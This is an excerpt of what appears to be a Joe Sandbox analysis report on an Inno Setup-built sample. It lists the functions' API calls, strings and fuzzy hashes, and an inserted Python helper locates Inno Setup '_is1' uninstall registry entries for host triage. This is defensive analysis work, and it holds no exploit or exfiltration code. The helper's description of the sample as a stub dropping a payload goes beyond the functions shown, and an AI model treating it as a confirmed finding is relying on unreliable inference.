                                                                              • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                              • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                              • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                              • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                              • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                              • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                              • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                              • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                              • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                              • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                               Control-flow Graph (rendered graph not reproduced in this export): function entry 0046EECC, basic blocks 0046EECC through 0046F569; the executed/not-executed colouring is lost. The graph calls RegCloseKey directly and reaches RegSetValueExA through subroutines 0046ECB8 and 0046ED28 (see APIs below).
                                                                              APIs
                                                                                • Part of subcall function 0046ECB8: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,00475FFE,?,0049C1DC,?,0046EFCF,?,00000000,0046F56A,?,_is1), ref: 0046ECDB
                                                                                • Part of subcall function 0046ED28: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F3A6,?,?,00000000,0046F56A,?,_is1,?), ref: 0046ED3B
                                                                              • RegCloseKey.ADVAPI32(?,0046F571,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F5BC,?,?,0049C1DC,00000000), ref: 0046F564
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value$Close
                                                                              • String ID: " /SILENT$5.5.2 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                              • API String ID: 3391052094-2734025597
                                                                              • Opcode ID: 4b47327b70ee27fc59f023ce9095d4925cbd7ad973a1f437070c8b1580be5bb7
                                                                              • Instruction ID: 41df9594f94a3a106a445eb875b77748a5d5020e54387338891d7450c5044d2a
                                                                              • Opcode Fuzzy Hash: 4b47327b70ee27fc59f023ce9095d4925cbd7ad973a1f437070c8b1580be5bb7
                                                                              • Instruction Fuzzy Hash: CF123335A00109AFDB04EF55E981ADE73F5EB48304F60847BE840AB396EB78AD45CB5D

                                                                               Control-flow Graph (rendered graph not reproduced in this export): function entry 004923A8, basic blocks 004923A8 through 0049289C; the executed/not-executed colouring is lost. Besides the Sleep and FindWindowA calls listed under APIs, the graph's blocks call SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA and CharToOemBuffA, one per dispatched name in the string list below.
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,0049289D,?,?,?,?,00000000,00000000,00000000), ref: 004923E8
                                                                              • FindWindowA.USER32(00000000,00000000), ref: 00492419
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FindSleepWindow
                                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                              • API String ID: 3078808852-3310373309
                                                                              • Opcode ID: fc65408302e00bfaa9df3cfa690acb5bb30b22ebaabf7b5c0919dab2d319a526
                                                                              • Instruction ID: 9f3505894e5a6fd9d1366d4270c7319e33b1617852d99992837f934410b553a1
                                                                              • Opcode Fuzzy Hash: fc65408302e00bfaa9df3cfa690acb5bb30b22ebaabf7b5c0919dab2d319a526
                                                                              • Instruction Fuzzy Hash: 0CC182A0B042413BDB14FF3E9D4151F59A99B94708B118A3FB446EB38BCE7DED0A4399

                                                                               Control-flow Graph (rendered graph not reproduced in this export): function entry 00483560, basic blocks 00483560 through 00483636; the executed/not-executed colouring is lost. The graph resolves GetNativeSystemInfo, IsWow64Process, GetSystemWow64DirectoryA and RegDeleteKeyExA by name through GetModuleHandleA/GetProcAddress and falls back to GetSystemInfo when GetNativeSystemInfo is absent (see APIs below).
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483571
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048357E
                                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358C
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483594
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004835A0
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 004835C1
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004835D4
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004835DA
                                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004835F1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                              • API String ID: 2230631259-2623177817
                                                                              • Opcode ID: ecd875b9fed982c6964d0a5895b6aed5fdd9f377785afaacdd435e2d250d9586
                                                                              • Instruction ID: 55e3f4d73e57614863bf74929b0f0177a2d28665cd9645ad6096ae2f13a54172
                                                                              • Opcode Fuzzy Hash: ecd875b9fed982c6964d0a5895b6aed5fdd9f377785afaacdd435e2d250d9586
                                                                              • Instruction Fuzzy Hash: D6113D81549782B4DA21BB7D8D5AB6F1A888B10F5AF140C3B7C40753C2E96DCE458B6E

                                                                               Control-flow Graph (rendered graph not reproduced in this export): function entry 00468BFC, basic blocks 00468BFC through 00468E30; the executed/not-executed colouring is lost. The graph opens the uninstall key through subroutine 0042DE1C, reads the "Inno Setup: ..." values listed under Strings and closes the key with RegCloseKey (see APIs below).
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,00468E16,?,?,00000001,00000000,00000000,00468E31,?,00000000,00000000,?), ref: 00468DFF
                                                                              Strings
                                                                              • Inno Setup: User Info: Organization, xrefs: 00468DCE
                                                                              • Inno Setup: Icon Group, xrefs: 00468CDA
                                                                              • Inno Setup: Deselected Components, xrefs: 00468D40
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C5B
                                                                              • Inno Setup: Deselected Tasks, xrefs: 00468D8D
                                                                              • Inno Setup: User Info: Name, xrefs: 00468DBB
                                                                              • Inno Setup: No Icons, xrefs: 00468CE7
                                                                              • Inno Setup: User Info: Serial, xrefs: 00468DE1
                                                                              • %s\%s_is1, xrefs: 00468C79
                                                                              • Inno Setup: Setup Type, xrefs: 00468D0E
                                                                              • Inno Setup: Selected Components, xrefs: 00468D1E
                                                                              • Inno Setup: App Path, xrefs: 00468CBE
                                                                              • Inno Setup: Selected Tasks, xrefs: 00468D6B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1093091907
                                                                              • Opcode ID: 477994bb8960d1965e10b40f61816eaf4c7b707db17a7ca4aa6169c09ca9eb9e
                                                                              • Instruction ID: 0c37994fccd001a995e494b6850b37eb05b7d5ed784e69181523ebf3a7e49158
                                                                              • Opcode Fuzzy Hash: 477994bb8960d1965e10b40f61816eaf4c7b707db17a7ca4aa6169c09ca9eb9e
                                                                              • Instruction Fuzzy Hash: 8D51C570A006049BCB10DB65C941BDEB7F5EF48304F50856EE840AB391EB38AF01CB6D
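The function at 0046EECC above registers the installer under `Software\Microsoft\Windows\CurrentVersion\Uninstall\<AppId>_is1` (values such as `Inno Setup: Setup Version`, `Inno Setup: App Path`, `UninstallString`, `QuietUninstallString` with `/SILENT`, `NoModify`, `NoRepair`), and the function at 00468BFC reads the same `%s\%s_is1` key back. The following host-triage helper is an added example, not code from this report or from the sample: it parses a `reg export`-style dump of the Uninstall hive and lists every entry that carries those Inno Setup markers, so an analyst can locate where the stub registered itself and what uninstall command it left behind. The dump, the app id `ExampleApp`, the paths and the user name are constructed for the example; the `5.5.2 (a)` version string is the one that appears in the string list of the registering function.

```python
import re

# Root the sample's format string "%s\%s_is1" is applied to (from the report strings).
UNINSTALL_ROOT = r"Software\Microsoft\Windows\CurrentVersion\Uninstall"

# Value names the registering function writes; any of them marks an Inno Setup entry.
INNO_MARKERS = ("Inno Setup: Setup Version", "Inno Setup: App Path", "Inno Setup: User")

# Constructed sample of a `reg export` of the Uninstall hive (hypothetical app id,
# paths and user; the setup version string is the one seen in the report).
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ExampleApp_is1]
"Inno Setup: Setup Version"="5.5.2 (a)"
"Inno Setup: App Path"="C:\\Program Files (x86)\\ExampleApp"
"Inno Setup: User"="analyst"
"InstallLocation"="C:\\Program Files (x86)\\ExampleApp\\"
"DisplayName"="ExampleApp"
"UninstallString"="\"C:\\Program Files (x86)\\ExampleApp\\unins000.exe\""
"QuietUninstallString"="\"C:\\Program Files (x86)\\ExampleApp\\unins000.exe\" /SILENT"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11111111-2222-3333-4444-555555555555}]
"DisplayName"="Unrelated MSI Package"
"UninstallString"="MsiExec.exe /X{11111111-2222-3333-4444-555555555555}"
'''


def inno_uninstall_key(app_id: str) -> str:
    """Key path the stub builds with its '%s\\%s_is1' format string."""
    return "%s\\%s_is1" % (UNINSTALL_ROOT, app_id)


def _unescape_reg_string(s: str) -> str:
    # .reg text escapes backslash and double quote with a backslash.
    return re.sub(r'\\(["\\])', r"\1", s)


_VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def parse_reg_export(text: str) -> dict:
    """Parse .reg text into {key_path: {value_name: value}}.

    REG_SZ becomes str, REG_DWORD becomes int; other types are kept as raw text.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        m = _VALUE_LINE.match(line)
        if not m:
            continue
        name = "" if m.group(1) == "@" else _unescape_reg_string(m.group(2))
        val = m.group(3)
        if len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            keys[current][name] = _unescape_reg_string(val[1:-1])
        elif val.startswith("dword:"):
            keys[current][name] = int(val[6:], 16)
        else:
            keys[current][name] = val
    return keys


def find_inno_installs(keys: dict) -> list:
    """Return a summary for every Uninstall entry that looks Inno Setup-registered."""
    hits = []
    for path, values in keys.items():
        leaf = path.rsplit("\\", 1)[-1]
        is1 = leaf.lower().endswith("_is1")
        if not (is1 or any(k in values for k in INNO_MARKERS)):
            continue
        quiet = values.get("QuietUninstallString", "")
        hits.append({
            "key": path,
            "app_id": leaf[:-4] if is1 else leaf,
            "display_name": values.get("DisplayName"),
            "setup_version": values.get("Inno Setup: Setup Version"),
            "install_location": values.get("InstallLocation") or values.get("Inno Setup: App Path"),
            "uninstall_string": values.get("UninstallString"),
            # The stub appends " /SILENT" to build QuietUninstallString.
            "silent_uninstall": quiet.rstrip().upper().endswith("/SILENT"),
            "no_modify": values.get("NoModify") == 1,
            "marker_values": sorted(k for k in values if k.startswith("Inno Setup:")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_inno_installs(parse_reg_export(SAMPLE_REG_EXPORT)):
        print("%(key)s\n  app id: %(app_id)s  setup: %(setup_version)s\n"
              "  install: %(install_location)s\n  uninstall: %(uninstall_string)s" % hit)
```

On a live host the same logic applies to the output of `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall out.reg` (and, for a 32-bit stub like this one on 64-bit Windows, the `WOW6432Node` copy of that path); the `_is1` suffix is the reliable locator, and the `UninstallString` points at the `unins000.exe` the stub drops next to the payload.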

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15), ref: 0042D8AB
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                              • SHGetKnownFolderPath.SHELL32(00499D1C,00008000,00000000,?,00000000,0047C432), ref: 0047C336
                                                                              • CoTaskMemFree.OLE32(?,0047C37B), ref: 0047C36E
                                                                                • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                              • API String ID: 3771764029-544719455
                                                                              • Opcode ID: 458afd9a1cda60bc5c06d2a3f17cd4b8a975594a1455dcf27ea3d462b6d04529
                                                                              • Instruction ID: 599f5abe96f02a195e24b8b9203061af68f55c26e596fa95a84979d127ba116b
                                                                              • Opcode Fuzzy Hash: 458afd9a1cda60bc5c06d2a3f17cd4b8a975594a1455dcf27ea3d462b6d04529
                                                                              • Instruction Fuzzy Hash: 84619134A00204ABDB10EBA5E8D2A9E7B65EB54308F90C57FE804A7396C73C9E44CF5D

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                              • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                              • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                              • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                              • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                              • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                              • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                              • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                              • String ID: |6B
                                                                              • API String ID: 183575631-3009739247
                                                                              • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                              • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                              • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                              • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(74610000,SHGetFolderPathA), ref: 0047CA6A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$ptI$shell32.dll$shfolder.dll
                                                                              • API String ID: 190572456-2576699960
                                                                              • Opcode ID: de0f38486c819f413c08132c2c10785360ce7bb1d082894e1dd7e5610f115569
                                                                              • Instruction ID: 1b7f257eac351b2865de88edbb479a2ab4f4c09eb1d5ad9e3bfc9d6f8503b50a
                                                                              • Opcode Fuzzy Hash: de0f38486c819f413c08132c2c10785360ce7bb1d082894e1dd7e5610f115569
                                                                              • Instruction Fuzzy Hash: 66310E70A001099BCB00EB95D5D2AEEB7B5EB44305F50847BE404F7241D778AE45CBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498730), ref: 00406322
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498730), ref: 00406366
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
